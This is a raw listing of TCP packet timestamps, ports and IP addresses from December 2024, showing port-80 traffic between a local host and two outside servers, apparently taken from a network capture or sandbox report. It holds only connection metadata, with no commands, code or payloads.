                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.453685045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.453707933 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.453732014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.454595089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.454705954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.454824924 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.455574989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.455588102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.455707073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.456506968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.457165003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.457525015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.457632065 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.457696915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.458549023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.458658934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.458688021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.458719969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.459592104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.459670067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.459784031 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.460474014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.509785891 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.600929976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.600950956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.600966930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.600979090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.601078033 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.601135969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.601526976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.601541042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.601635933 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.602551937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.602574110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.602608919 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.603534937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.603600979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.603610992 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.604548931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.604615927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.604876041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.605581999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.605673075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.605801105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.606683969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.606698990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.606734037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.607764959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.607903004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.607979059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.608655930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.608717918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.608753920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.609695911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.609708071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.609814882 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.610676050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.611162901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.611690044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.611701965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.611716032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.611793041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.612699986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.612751961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.613807917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.613818884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.613831043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.613909006 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.614752054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.614825964 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.614862919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.615870953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.615927935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.616180897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.616919994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.616991997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.617825985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.617849112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.617930889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.617949963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.618827105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.618854046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.618951082 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.619869947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.619894028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.619935036 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.620803118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.620865107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.621706963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.621880054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.621901989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.621943951 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.622874975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.622941017 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.623898029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.623924017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.623934031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.624083042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.624922991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.624991894 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.625376940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.625897884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.625952005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.625973940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.626914024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.626981020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.627985954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.628021002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.628174067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.628448009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.628983021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.629017115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.629055023 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.629955053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.630023956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.631030083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.631062984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.631146908 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.631186008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.632040977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.632108927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.632138014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.633023977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.633090019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.633601904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.634088993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.634164095 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.634210110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.635094881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.635150909 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.635206938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.636094093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.636627913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.636689901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.637106895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.637181044 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.637238979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.638186932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.638287067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.638315916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.639178038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.639234066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.639342070 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.640120029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.640198946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.641165018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.641212940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.641247034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.641273022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.642127037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.642235041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.642817020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.643168926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.643202066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.643237114 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.644144058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.644226074 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.644298077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.645174980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.645245075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.645526886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.646228075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.646297932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.646524906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.647187948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.647254944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.647345066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.648214102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.649282932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.649316072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.649349928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.649380922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.649410009 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.650227070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.650356054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.650392056 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.651226044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.651521921 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.651998997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.652339935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.652401924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.652415991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.697216034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752664089 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752757072 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752760887 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752772093 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752779007 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752806902 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752847910 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752847910 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752891064 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752901077 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752913952 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752924919 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752934933 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752963066 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752963066 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.753046036 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.793375015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.793406963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.793570995 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.793621063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.793782949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.793859005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.794389963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.794632912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.794759035 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.795398951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.795515060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.795617104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.796400070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.797465086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.797486067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.797504902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.797580004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.797607899 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.798464060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.799108028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.799210072 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.799568892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.799592018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.799684048 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.800523043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.800595999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.800692081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.801553965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.801590919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.802510977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.802623987 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.803616047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.803642035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.803662062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.804500103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.804565907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.805562973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.805577040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.805583954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.805666924 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.806600094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.806854010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.806976080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.807600975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.807621002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.807719946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.808561087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.808701038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.809180021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.809586048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.809986115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.810103893 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.810664892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.810672998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.811180115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.811717033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.811780930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.811897993 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.812684059 CET8049946185.81.68.147192.168.2.10
